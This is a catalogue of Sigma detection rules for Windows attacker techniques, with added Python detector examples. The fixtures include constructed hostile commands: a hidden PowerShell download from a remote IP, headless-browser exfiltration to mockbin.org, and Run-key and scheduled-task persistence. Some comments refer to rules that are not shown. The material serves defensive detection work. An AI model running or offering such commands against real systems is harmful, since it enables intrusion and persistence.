https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolscript_register_app.yml

AddinUtil.EXE Execution From Uncommon Directory

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.

The tag is: misp-galaxy:sigma-rules="AddinUtil.EXE Execution From Uncommon Directory"

AddinUtil.EXE Execution From Uncommon Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10391. Table References

Links

https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml

Command Line Execution with Suspicious URL and AppData Strings

Detects a suspicious command line that contains both a URL and an AppData path in its parameters, as used by several droppers (js/vbs > powershell)

The tag is: misp-galaxy:sigma-rules="Command Line Execution with Suspicious URL and AppData Strings"

Command Line Execution with Suspicious URL and AppData Strings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10392. Table References

Links

https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100

https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml

PUA - DIT Snapshot Viewer

Detects the use of the Ditsnap tool, an inspection tool for the Active Directory database, ntds.dit.

The tag is: misp-galaxy:sigma-rules="PUA - DIT Snapshot Viewer"

PUA - DIT Snapshot Viewer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10393. Table References

Links

https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap

https://thedfirreport.com/2020/06/21/snatch-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml

MMC20 Lateral Movement

Detects MMC20.Application lateral movement; specifically, it looks for mmc.exe spawned as a child of svchost.exe with a command line containing "-Embedding", which is how DCOM activates the MMC20.Application object

The tag is: misp-galaxy:sigma-rules="MMC20 Lateral Movement"

MMC20 Lateral Movement has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 10394. Table References

Links

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml
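This rule and the earlier HTML Help (hh.exe) child-process rule are parent/child relationship checks rather than command-line pattern checks: which image spawned which, plus, for MMC20, one specific switch. The Python below is an added example, not code from this page or from Sigma: a small table-driven matcher run over constructed Sysmon-style events (ParentImage, Image, CommandLine). The child-image list for hh.exe and the exact conditions are my approximation of the two rules, not their real logic.

```python
# Constructed process-creation events (Sysmon-style fields); none come from the page.
EVENTS = [
    {"ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c iwr http://198.51.100.7/a.ps1 -o a.ps1"},
    {"ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" -Embedding'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" C:\Windows\System32\compmgmt.msc'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Windows\System32\services.msc"'},
]

# Each rule: parent image suffixes, child image suffixes, optional command-line needles.
# The hh.exe child list is my assumption about what counts as "suspicious".
RULES = [
    {"name": "HTML Help HH.EXE Suspicious Child Process",
     "parent": ("\\hh.exe",),
     "image": ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\wscript.exe", "\\cscript.exe",
               "\\mshta.exe", "\\rundll32.exe", "\\regsvr32.exe", "\\wmic.exe", "\\certutil.exe",
               "\\bitsadmin.exe", "\\msiexec.exe")},
    {"name": "MMC20 Lateral Movement",
     "parent": ("\\svchost.exe",),
     "image": ("\\mmc.exe",),
     "cmdline": (" -Embedding",)},
]


def _ends_with_any(path, suffixes):
    p = path.lower()
    return any(p.endswith(s.lower()) for s in suffixes)


def match_rule(rule, ev):
    """Parent and child image must both match; command-line needles only if the rule has them."""
    if not _ends_with_any(ev["ParentImage"], rule["parent"]):
        return False
    if not _ends_with_any(ev["Image"], rule["image"]):
        return False
    needles = rule.get("cmdline")
    if needles:
        cl = ev["CommandLine"].lower()
        return any(n.lower() in cl for n in needles)
    return True


def run_rules(events, rules=RULES):
    """Return [(event_index, rule_name)] for every matching (event, rule) pair."""
    return [(i, r["name"]) for i, ev in enumerate(events) for r in rules if match_rule(r, ev)]


if __name__ == "__main__":
    for i, name in run_rules(EVENTS):
        ev = EVENTS[i]
        print(f"[{name}] {ev['ParentImage']} -> {ev['CommandLine']}")
```

Because the MMC20 object is activated by DCOM, the parent is svchost.exe (the DcomLaunch host) and not anything belonging to the remote operator, so the process tree alone cannot tell you where the request came from; the inbound DCOM/RPC connection in network or firewall telemetry is what ties the event to a source host.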

Renamed PsExec Service Execution

Detects the suspicious launch of a renamed version of the PSEXESVC service binary, something legitimate administrators rarely do

The tag is: misp-galaxy:sigma-rules="Renamed PsExec Service Execution"

Table 10396. Table References

Links

https://www.youtube.com/watch?v=ro2QuZTIMBM

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml

Operator Bloopers Cobalt Strike Commands

Detects use of Cobalt Strike commands accidentally entered in the CMD shell

The tag is: misp-galaxy:sigma-rules="Operator Bloopers Cobalt Strike Commands"

Operator Bloopers Cobalt Strike Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10397. Table References

Links

https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf

https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml

Audit Policy Tampering Via Auditpol

Threat actors can use the auditpol binary to change the audit policy configuration in order to impair detection. This can be done by selectively disabling or removing certain audit policies, or by restoring a custom policy supplied by the threat actor.

The tag is: misp-galaxy:sigma-rules="Audit Policy Tampering Via Auditpol"

Audit Policy Tampering Via Auditpol has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10398. Table References

Links

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_auditpol_susp_execution.yml

Chromium Browser Headless Execution To Mockbin Like Site

Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).

The tag is: misp-galaxy:sigma-rules="Chromium Browser Headless Execution To Mockbin Like Site"

Table 10399. Table References

Links

https://www.zscaler.com/blogs/security-research/steal-it-campaign

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml

Potential Commandline Obfuscation Using Unicode Characters

Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

The tag is: misp-galaxy:sigma-rules="Potential Commandline Obfuscation Using Unicode Characters"

Potential Commandline Obfuscation Using Unicode Characters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10400. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http

https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml
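Unicode command-line obfuscation works because many Windows programs, and the ANSI "best fit" conversion underneath them, silently map look-alike characters to their ASCII counterparts: an en dash or em dash in place of "-", a division slash in place of "/", zero-width characters that split a keyword without changing what the program parses, fullwidth letters in place of the program name. The Python below is an added example, not code from this page or from Sigma. It normalises a command line using a constructed mapping table (an illustrative subset, not Windows' real best-fit tables; which substitutions a given binary actually accepts varies, see the referenced blog) and only fires when folding changed the line and the result carries an option switch, so legitimate non-ASCII paths are not flagged. All samples are constructed.

```python
import re
import unicodedata

# Constructed mapping of look-alikes that tooling tends to fold to ASCII (illustrative subset).
DASH_LIKE = {chr(c) for c in range(0x2010, 0x2016)} | {"\u2212", "\u02d7", "\ufe63"}  # hyphens/dashes, minus signs
SLASH_LIKE = {"\u2044", "\u2215", "\u29f8"}                                            # fraction/division slashes
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff", "\u00ad"}              # invisible separators, soft hyphen


def normalize_cmdline(s):
    """Fold look-alike characters to ASCII and drop invisible ones. NFKC takes care of
    the fullwidth block (e.g. 'ｐ' -> 'p', '－' -> '-')."""
    out = []
    for ch in s:
        if ch in ZERO_WIDTH:
            continue
        if ch in DASH_LIKE:
            out.append("-")
        elif ch in SLASH_LIKE:
            out.append("/")
        else:
            out.append(unicodedata.normalize("NFKC", ch))
    return "".join(out)


def suspicious_chars(s):
    """List (char, 'U+XXXX', unicode name) for every character the normaliser would change."""
    found = []
    for ch in s:
        if ch in DASH_LIKE or ch in SLASH_LIKE or ch in ZERO_WIDTH or unicodedata.normalize("NFKC", ch) != ch:
            found.append((ch, "U+%04X" % ord(ch), unicodedata.name(ch, "?")))
    return found


def is_obfuscated(s):
    """Fire only when folding changed the line AND the folded line contains an option switch.
    Plain non-ASCII such as an accented user name is unchanged by folding and never fires."""
    if not suspicious_chars(s):
        return False
    norm = normalize_cmdline(s)
    return norm != s and re.search(r"(^|\s)[-/][A-Za-z]", norm) is not None


# Constructed command lines; none are taken from the page.
SAMPLES = [
    "powershell \u2014nop \u2013w hidden \u2013ep bypass",                                  # em/en dashes as switch chars
    "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \u2215v Updater "
    "\u2215t REG_SZ \u2215d C:\\Users\\Public\\u.exe \u2215f",                              # division slash as switch char
    "cmd /c who\u200bami /priv",                                                           # zero-width space inside a keyword
    "\uff50\uff4f\uff57\uff45\uff52\uff53\uff48\uff45\uff4c\uff4c -nop -c Get-Process",    # fullwidth 'powershell'
    "powershell -nop -w hidden -ep bypass",                                                # plain, nothing to fold
    "C:\\Users\\Jos\u00e9\\tools\\scan.exe -h",                                             # legitimate non-ASCII path
]

if __name__ == "__main__":
    for s in SAMPLES:
        if is_obfuscated(s):
            chars = ", ".join(f"{cp} {name}" for _, cp, name in suspicious_chars(s))
            print(f"OBFUSCATED  {normalize_cmdline(s)!r}  via {chars}")
```

Running the detection on the normalised line rather than the raw one also lets every other command-line rule (the reg.exe and PowerShell checks on this page included) see through the substitution, which is the cheaper fix compared with teaching each rule about every look-alike character.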

Powershell Token Obfuscation - Process Creation

Detects the token obfuscation technique from Invoke-Obfuscation

The tag is: misp-galaxy:sigma-rules="Powershell Token Obfuscation - Process Creation"

Powershell Token Obfuscation - Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Embedded Payloads - T1027.009" with estimative-language:likelihood-probability="almost-certain"

Table 10401. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml

PUA - Radmin Viewer Utility Execution

Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines

The tag is: misp-galaxy:sigma-rules="PUA - Radmin Viewer Utility Execution"

PUA - Radmin Viewer Utility Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 10402. Table References

Links

https://www.radmin.fr/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_radmin.yml

Windows Firewall Disabled via PowerShell

Detects attempts to disable the Windows Firewall using PowerShell

The tag is: misp-galaxy:sigma-rules="Windows Firewall Disabled via PowerShell"

Windows Firewall Disabled via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 10403. Table References

Links

https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_firewall.yml

Browser Started with Remote Debugging

Detects browsers started with remote debugging flags, a technique often used for browser injection and session or cookie theft

The tag is: misp-galaxy:sigma-rules="Browser Started with Remote Debugging"

Browser Started with Remote Debugging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"

Table 10404. Table References

Links

https://github.com/defaultnamehere/cookie_crimes/

https://github.com/wunderwuzzi23/firefox-cookiemonster

https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf

https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml
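This rule and the earlier headless-to-mockbin rule both come down to parsing browser command-line switches: --headless together with a positional URL on a data-collection host for the former, a remote-debugging switch for the latter. The Python below is an added example, not code from this page or from Sigma. It splits a Chromium- or Firefox-style command line into switches and positional arguments, resolves the host of each URL argument, and applies the two checks to constructed samples. The browser image list, the exfiltration host list (only mockbin.org, taken from the rule description) and the set of debugging switches are my assumptions.

```python
import re
from urllib.parse import urlsplit

BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe", "opera.exe", "vivaldi.exe", "firefox.exe"}
EXFIL_HOSTS = ("mockbin.org",)                       # extend with other request-bin style services you care about
DEBUG_SWITCHES = {"remote-debugging-port", "remote-debugging-pipe", "start-debugger-server"}  # Chromium, Chromium, Firefox


def win_split(cmdline):
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def parse_browser_cmdline(cmdline):
    """Return (image_basename, switches, positionals). switches maps name -> value ('' if
    none); both --name and -name forms are accepted since Firefox uses a single dash."""
    toks = win_split(cmdline)
    if not toks:
        return "", {}, []
    image = toks[0].rsplit("\\", 1)[-1].lower()
    switches, positionals = {}, []
    for tok in toks[1:]:
        if tok.startswith("-") and len(tok) > 1:
            name, _, value = tok.lstrip("-").partition("=")
            switches[name.lower()] = value
        else:
            positionals.append(tok)
    return image, switches, positionals


def url_host(arg):
    """Host of a URL argument; a bare 'host/path' without scheme is accepted the way browsers do."""
    target = arg if "://" in arg else "//" + arg
    return (urlsplit(target).hostname or "").lower()


def headless_to_exfil_site(cmdline):
    image, sw, pos = parse_browser_cmdline(cmdline)
    if image not in BROWSER_IMAGES or "headless" not in sw:      # --headless and --headless=new both count
        return False
    return any(url_host(p) == h or url_host(p).endswith("." + h) for p in pos for h in EXFIL_HOSTS)


def remote_debugging_enabled(cmdline):
    image, sw, _ = parse_browser_cmdline(cmdline)
    return image in BROWSER_IMAGES and bool(DEBUG_SWITCHES.intersection(sw))


RULES = [("Chromium Browser Headless Execution To Mockbin Like Site", headless_to_exfil_site),
         ("Browser Started with Remote Debugging", remote_debugging_enabled)]


def run_rules(cmdlines):
    return [(i, name) for i, cl in enumerate(cmdlines) for name, check in RULES if check(cl)]


# Constructed command lines; none are taken from the page.
SAMPLES = [
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --dump-dom https://mockbin.org/bin/7d3c?host=WS-042',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\bob\AppData\Local\Microsoft\Edge\User Data"',
    r'chrome.exe --headless=new --screenshot https://intranet.example.local/report',
    r'"C:\Program Files\Mozilla Firefox\firefox.exe" --start-debugger-server 9222',
    r'chrome.exe https://www.example.com/',
    r'C:\Users\bob\Downloads\tool.exe --headless https://mockbin.org/bin/7d3c',
]

if __name__ == "__main__":
    for i, name in run_rules(SAMPLES):
        print(f"[{name}] {SAMPLES[i]}")
```

Browser automation frameworks (Selenium, Puppeteer, Playwright) start browsers with --remote-debugging-port or --remote-debugging-pipe as a matter of course, so on developer and CI machines the parent process is the discriminator: a test runner parent is expected, explorer.exe or an Office process is not. Note also that --remote-debugging-port together with --user-data-dir pointing at the real profile, as in the second sample, is the combination that exposes the live session.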

Suspicious Kernel Dump Using Dtrace

Detects a suspicious way of dumping the kernel on Windows using dtrace.exe, which has been available on Windows since Windows 10 19H1 (version 1903)

The tag is: misp-galaxy:sigma-rules="Suspicious Kernel Dump Using Dtrace"

Suspicious Kernel Dump Using Dtrace has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10405. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace

https://twitter.com/0gtweet/status/1474899714290208777?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml

Privilege Escalation via Named Pipe Impersonation

Detects a privilege escalation attempt via named pipe impersonation, in which a command shell is made to connect to an attacker-controlled named pipe so that the listening process can impersonate the connecting client's token (the technique behind the getsystem command of Meterpreter and Cobalt Strike).

The tag is: misp-galaxy:sigma-rules="Privilege Escalation via Named Pipe Impersonation"

Privilege Escalation via Named Pipe Impersonation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 10406. Table References

Links

https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml

Suspicious Double Extension File Execution

Detects the suspicious use of an .exe extension behind a non-executable extension (for example .pdf.exe), optionally padded with a run of spaces or underscores, to cloak an executable in spear-phishing campaigns

The tag is: misp-galaxy:sigma-rules="Suspicious Double Extension File Execution"

Suspicious Double Extension File Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10407. Table References

Links

https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html

https://twitter.com/blackorbird/status/1140519090961825792

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml
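The Python below is an added example, not code from this page or from Sigma: a check for the decoy-extension pattern on constructed events, covering the bare form (invoice.pdf.exe), the space-padded form and the underscore-padded form the description mentions. The list of decoy extensions is my choice and is the part you would tune; the event fields follow Sysmon naming.

```python
import re

# Extensions a user expects to open a document or media file, not a program (my list).
DECOY_EXTS = r"pdf|docx?|xlsx?|pptx?|rtf|txt|csv|jpe?g|png|gif|bmp|mp[34]|zip|rar|7z"
DOUBLE_EXT_RE = re.compile(r"\.(" + DECOY_EXTS + r")([ _]*)\.exe$", re.IGNORECASE)


def win_split(cmdline):
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def double_extension(path):
    """Return (decoy_extension, padding) for a cloaked executable name, else None.
    padding is 'none', 'spaces', 'underscores' or 'mixed' depending on the filler
    between the decoy extension and '.exe'."""
    name = re.split(r"[\\/]", path)[-1]
    m = DOUBLE_EXT_RE.search(name)
    if not m:
        return None
    ext, filler = m.group(1).lower(), m.group(2)
    if not filler:
        padding = "none"
    elif set(filler) == {" "}:
        padding = "spaces"
    elif set(filler) == {"_"}:
        padding = "underscores"
    else:
        padding = "mixed"
    return ext, padding


def scan_event(event):
    """Check the Image field and the program token of CommandLine, the two places
    the cloaked name shows up in a process-creation event."""
    candidates = [event.get("Image", "")] + win_split(event.get("CommandLine", ""))[:1]
    for candidate in candidates:
        hit = double_extension(candidate)
        if hit:
            return hit
    return None


# Constructed events; none are taken from the page.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\bob\Downloads\Invoice_2024.pdf.exe",
     "CommandLine": r'"C:\Users\bob\Downloads\Invoice_2024.pdf.exe"'},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\photo.jpg                                .exe",
     "CommandLine": r'"C:\Users\bob\AppData\Local\Temp\photo.jpg                                .exe"'},
    {"Image": r"C:\Users\bob\Desktop\report.docx____.exe",
     "CommandLine": r'"C:\Users\bob\Desktop\report.docx____.exe" /quiet'},
    {"Image": r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
     "CommandLine": r'"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" C:\Users\bob\Downloads\Invoice_2024.pdf'},
    {"Image": r"C:\Tools\pdf2exe.exe", "CommandLine": r"pdf2exe.exe --in a.pdf"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(scan_event(ev), ev["Image"])
```

The fourth sample shows why only the program token of the command line is inspected: a legitimate reader opening a .pdf argument must not trip the rule. Sysmon's OriginalFileName (from the PE version resource) is a useful second signal for the hits, since a cloaked dropper rarely carries a plausible one.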

Suspicious Rundll32 Setupapi.dll Activity

The setupapi.dll library provides the InstallHinfSection function for processing INF files. An INF file may contain instructions to create registry values, modify files and install drivers. This technique could be used to obtain persistence by modifying one of the Run or RunOnce registry keys, to run a process, or to chain calls into other DLLs (see references). InstallHinfSection in setupapi.dll calls the runonce.exe executable regardless of the actual content of the INF file.

The tag is: misp-galaxy:sigma-rules="Suspicious Rundll32 Setupapi.dll Activity"

Suspicious Rundll32 Setupapi.dll Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10408. Table References

Links

https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20

https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf

https://lolbas-project.github.io/lolbas/Libraries/Setupapi/

https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml

Suspicious Execution From GUID Like Folder Names

Detects potentially suspicious execution from a GUID-like folder name in a suspicious location such as %TEMP%, as seen in IcedID attacks

The tag is: misp-galaxy:sigma-rules="Suspicious Execution From GUID Like Folder Names"

Suspicious Execution From GUID Like Folder Names has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10409. Table References

Links

https://twitter.com/Kostastsale/status/1565257924204986369

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml

Visual Studio Code Tunnel Service Installation

Detects the installation of the VS Code tunnel (code-tunnel) as a service.

The tag is: misp-galaxy:sigma-rules="Visual Studio Code Tunnel Service Installation"

Visual Studio Code Tunnel Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10410. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://code.visualstudio.com/docs/remote/tunnels

https://badoption.eu/blog/2023/01/31/code_c2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_service_install.yml

Suspicious Scheduled Task Name As GUID

Detects the creation of a scheduled task with a GUID-like name

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Name As GUID"

Suspicious Scheduled Task Name As GUID has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10411. Table References

Links

https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_guid_task_name.yml
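Two rules on this page key on GUID-like names: the folder a process runs from (Suspicious Execution From GUID Like Folder Names, earlier) and the name given to a scheduled task (this rule). The Python below is an added example, not code from this page or from Sigma: one GUID matcher serving both checks over constructed events. The "suspicious location" list, the allowlist and the decision that only a task name which is exactly a GUID counts are my assumptions; they matter because Windows Installer, Package Cache and vendor updaters legitimately use GUID folders and GUID-suffixed task names.

```python
import re

GUID = r"\{?[0-9A-Fa-f]{8}-(?:[0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}\}?"
GUID_FULL = re.compile("^" + GUID + "$")

# Locations where a GUID-named folder is unusual (my list) and known-good exceptions
# inside them (installers and package caches use GUID folders by design).
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\",
                   "\\appdata\\roaming\\", "\\programdata\\")
ALLOWED_DIRS = ("\\programdata\\package cache\\", "\\windows\\installer\\")


def win_split(cmdline):
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def guid_folder_execution(image):
    """True when the executable sits below a folder whose name is exactly a GUID
    and the path is in a suspicious location that is not allowlisted."""
    p = image.lower()
    if any(a in p for a in ALLOWED_DIRS) or not any(d in p for d in SUSPICIOUS_DIRS):
        return False
    dirs = p.split("\\")[:-1]
    return any(GUID_FULL.match(d) for d in dirs)


def guid_named_task_creation(cmdline):
    """Task name if this is 'schtasks /create' with a name that is exactly a GUID, else None.
    Only the leaf is tested because tasks can live in folders (\Vendor\{GUID})."""
    toks = win_split(cmdline)
    if not toks or toks[0].rsplit("\\", 1)[-1].lower() not in ("schtasks", "schtasks.exe"):
        return None
    low = [t.lower() for t in toks]
    if "/create" not in low or "/tn" not in low:
        return None
    i = low.index("/tn")
    if i + 1 >= len(toks):
        return None
    name = toks[i + 1]
    leaf = name.rsplit("\\", 1)[-1]
    return name if GUID_FULL.match(leaf) else None


def run_rules(events):
    hits = []
    for idx, ev in enumerate(events):
        if guid_folder_execution(ev["Image"]):
            hits.append((idx, "Suspicious Execution From GUID Like Folder Names"))
        if guid_named_task_creation(ev["CommandLine"]):
            hits.append((idx, "Suspicious Scheduled Task Name As GUID"))
    return hits


# Constructed events; the GUIDs and names are made up.
G1 = "{7A1F3C2E-9B4D-4E6A-8C1D-2F3E4A5B6C7D}"
G2 = "{1B2C3D4E-5F60-4718-8293-A4B5C6D7E8F9}"
EVENTS = [
    {"Image": rf"C:\Users\bob\AppData\Local\Temp\{G1}\update.exe", "CommandLine": "update.exe"},
    {"Image": rf"C:\ProgramData\Package Cache\{G1}\vc_redist.x64.exe", "CommandLine": "vc_redist.x64.exe /quiet"},
    {"Image": rf"C:\ProgramData\{G2}\svc.exe", "CommandLine": "svc.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": rf'schtasks /create /tn "{G2}" /tr "C:\Users\Public\svc.exe" /sc minute /mo 5 /f'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": rf'schtasks /create /tn "VendorUpdateTaskMachineUA{G2}" /xml update.xml'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": rf'schtasks.exe /Create /TN "\Updater\{G2}" /XML C:\Users\Public\t.xml'},
    {"Image": r"C:\Windows\System32\schtasks.exe", "CommandLine": rf'schtasks /query /tn "{G2}"'},
]

if __name__ == "__main__":
    for idx, name in run_rules(EVENTS):
        print(f"[{name}] {EVENTS[idx]['CommandLine'] or EVENTS[idx]['Image']}")
```

The fifth sample (a vendor-style name with a GUID appended) is deliberately not flagged: matching a GUID anywhere in the task name would page you for every updater on the estate, which is why the check is a full match on the leaf name.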

Suspicious Key Manager Access

Detects the invocation of the Stored User Names and Passwords dialog (Key Manager)

The tag is: misp-galaxy:sigma-rules="Suspicious Key Manager Access"

Suspicious Key Manager Access has relationships with:

